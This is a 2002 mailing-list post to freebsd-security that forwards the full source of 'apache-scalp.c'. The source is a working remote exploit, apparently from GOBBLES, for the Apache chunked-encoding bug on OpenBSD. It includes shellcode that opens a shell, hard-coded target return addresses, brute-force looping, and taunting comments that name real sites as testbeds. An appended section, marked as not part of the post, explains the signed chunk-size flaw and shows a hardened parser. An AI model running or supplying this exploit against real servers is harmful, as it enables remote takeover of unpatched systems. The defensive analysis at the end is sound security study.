Date:      Wed, 19 Jun 2002 15:26:49 -0700
From:      Jason DiCioccio <geniusj@bluenugget.net>
To:        freebsd-security@freebsd.org
Subject:   Apache exploit?
Message-ID:  <2147483647.1024500409@[192.168.4.154]>

I don't know if this has already made bugtraq, or if it's waiting in their
queue or what.. But I just happened to get ahold of this recently.  It
appears that FreeBSD and OpenBSD are exploitable.

I haven't tested it yet, as I have already upgraded.

Courtesy of Gobbles apparently..

The wrapping is a bit messed up, but I'm lazy :)

Cheers,
-JD-

--
Jason DiCioccio     - jd@bluenugget.net  - Useless .sig
Open Domain Service - geniusj@ods.org    - http://www.ods.org/
Ruby                - jd@ruby-lang.org   - http://www.ruby-lang.org/

PGP Fingerprint - C442 04E2 26B0 3809 8357  96AB D350 9596 0436 7C08

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 *
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great.
 *
 * [#!GOBBLES QUOTES]
 *
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
 * --- I hope Theo doesn't kill himself
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>


#define EXPLOIT_TIMEOUT		5	/* num seconds to wait before assuming it failed */
#define RET_ADDR_INC		512


#define MEMCPY_s1_OWADDR_DELTA	-146
#define PADSIZE_1		4
#define PADSIZE_2 		5
#define PADSIZE_3		7


#define REP_POPULATOR		24
#define REP_RET_ADDR		6
#define REP_ZERO		36
#define REP_SHELLCODE		24
#define NOPCOUNT		1024

#define NOP			0x41
#define PADDING_1		'A'
#define PADDING_2		'B'
#define PADDING_3		'C'

#define PUT_STRING(s)		memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)		memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =
  "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
  "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
  "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
  "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
  "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
  "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
  "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
  "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
  "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";


struct {
	char *type;
	u_long retaddr;
} targets[] = {	// hehe, yes theo, that say OpenBSD here!
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",	0xcf92f },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",	0x8f0aa },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",	0x8f2a6 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",	0x9011a },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",	0x932ae },
};


int main(int argc, char *argv[]) {

	char           *hostp, *portp;
	unsigned char   buf[512], *expbuf, *p;
	int             i, j, lport;
	int             sock;
	int             bruteforce, owned, progress;
	u_long          retaddr;
	struct sockaddr_in sin, from;
	socklen_t       fromlen;	/* getsockname() wants socklen_t, not int */


	if(argc != 3) {
		printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
		printf("  Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
		printf("  Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
		printf("\n--- --- - Potential targets list - --- ----\n");
		printf("Target ID / Target specification\n");
		/* element count, not a hard-coded struct size (wrong on 64-bit) */
		for(i = 0; i < sizeof(targets)/sizeof(targets[0]); i++)
			printf("\t%d / %s\n", i, targets[i].type);

		return -1;
	}


	hostp = strtok(argv[2], ":");
	if((portp = strtok(NULL, ":")) == NULL)
		portp = "80";

	retaddr = strtoul(argv[1], NULL, 16);
	if(retaddr < sizeof(targets)/sizeof(targets[0])) {
		retaddr = targets[retaddr].retaddr;
		bruteforce = 0;
	}
	else
		bruteforce = 1;


	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

		/* skip invalid return addresses */
		i = retaddr & 0xff;
		if(i == 0x0a || i == 0x0d)
			retaddr++;
		else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
			continue;


		sock = socket(AF_INET, SOCK_STREAM, 0);
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = inet_addr(hostp);
		sin.sin_port = htons(atoi(portp));
		if(!progress)
			printf("\n[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		/* Setup the local port in our shellcode */
		fromlen = sizeof(from);
		if(getsockname(sock, (struct sockaddr *) & from, &fromlen) != 0) {
			perror("getsockname()");
			exit(1);
		}

		lport = ntohs(from.sin_port);
		shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
		shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;


		p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
				    + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");

		for (i = 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p += sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i = 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j = 0; j < REP_RET_ADDR; j++) {
				*p++ = retaddr & 0xff;
				*p++ = (retaddr >> 8) & 0xff;
				*p++ = (retaddr >> 16) & 0xff;
				*p++ = (retaddr >> 24) & 0xff;
			}

			PUT_BYTES(REP_ZERO, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
		PUT_STRING(buf);

		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) == 0)
			progress = 1;

		if(progress == 1) {
			memset(buf, 0, sizeof(buf));
			sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
				retaddr, (unsigned int)(p - expbuf), lport);
			memset(buf + strlen(buf), ' ', 74 - strlen(buf));
			puts(buf);
			if(bruteforce)
				putchar(';');
		}
		else
			putchar((rand()%2)? 'P': 'p');


		fflush(stdout);
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec = EXPLOIT_TIMEOUT;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);

			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
						break;

					if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
						printf("\nGOBBLE GOBBLE!@#%%)*#\n");
						printf("retaddr 0x%lx did the trick!\n", retaddr);
						sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
						write(sock, expbuf, strlen(expbuf));
						owned++;
					}

					write(1, buf, n);
				}

				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);

					write(sock, buf, n);
				}
			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}
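The "chunking" bug the header comment refers to comes down to a chunk size that is parsed into a signed integer: the last chunk the code above emits, formatted with "%x" from MEMCPY_s1_OWADDR_DELTA (-146), is the text "ffffff6e", which a 32-bit signed parse turns back into -146. The following is an added example for readers of this list, not part of the post and not Apache's code: a constructed sketch of the unsafe signed-size pattern beside a hardened chunk-size parser that rejects such input. The function names and the MAX_CHUNK_SIZE cap are assumptions.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed example, not Apache's code: the pattern that makes a negative
 * chunk size dangerous. Parsing the hex chunk-size text into a signed int
 * turns "ffffff6e" into -146 instead of rejecting it. */
static int chunk_size_unsafe(const char *line)
{
    return (int)strtoul(line, NULL, 16);
}

/* Follow-on defect: "copy min(remaining, bufsiz)" in signed arithmetic keeps
 * the negative value, which becomes a huge length once it reaches memcpy's
 * size_t parameter. Nothing is copied here; the length is just returned. */
static size_t unsafe_copy_len(int remaining, int bufsiz)
{
    int len = (remaining > bufsiz) ? bufsiz : remaining;
    return (size_t)len;
}

#define MAX_CHUNK_SIZE (1UL << 20)   /* assumed cap; tune per deployment */

/* Hardened parser: hex digits only (no sign or leading whitespace), no
 * overflow, bounded by a cap, and only ";ext" or CR may follow the digits.
 * Returns -1 to reject the request, otherwise the size as a non-negative long. */
static long chunk_size_safe(const char *line)
{
    char *end;
    unsigned long v;
    if (!isxdigit((unsigned char)line[0]))
        return -1;
    errno = 0;
    v = strtoul(line, &end, 16);
    if (errno == ERANGE || v > MAX_CHUNK_SIZE)
        return -1;
    if (*end != '\0' && *end != ';' && *end != '\r')
        return -1;
    return (long)v;
}

int main(void)
{
    const char *evil = "ffffff6e";   /* constructed chunk-size line */
    int bad = chunk_size_unsafe(evil);
    printf("unsafe: %d -> memcpy length %zu\n", bad, unsafe_copy_len(bad, 8192));
    printf("safe: %ld (rejected), %ld (accepted)\n",
           chunk_size_safe(evil), chunk_size_safe("5;ext=1\r\n"));
    return 0;
}
```

A server-side fix that bounds the size before it reaches any copy is the one that matters; the unsafe functions are kept only to make the failure mode visible.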